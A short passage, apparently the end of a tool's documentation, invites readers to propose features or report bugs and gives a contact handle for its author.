features will keep being added, so if you like the tool and want to collaborate by proposing new
features or reporting bugs, you are always welcome!
Contact:
David-Uton @David_Uton
108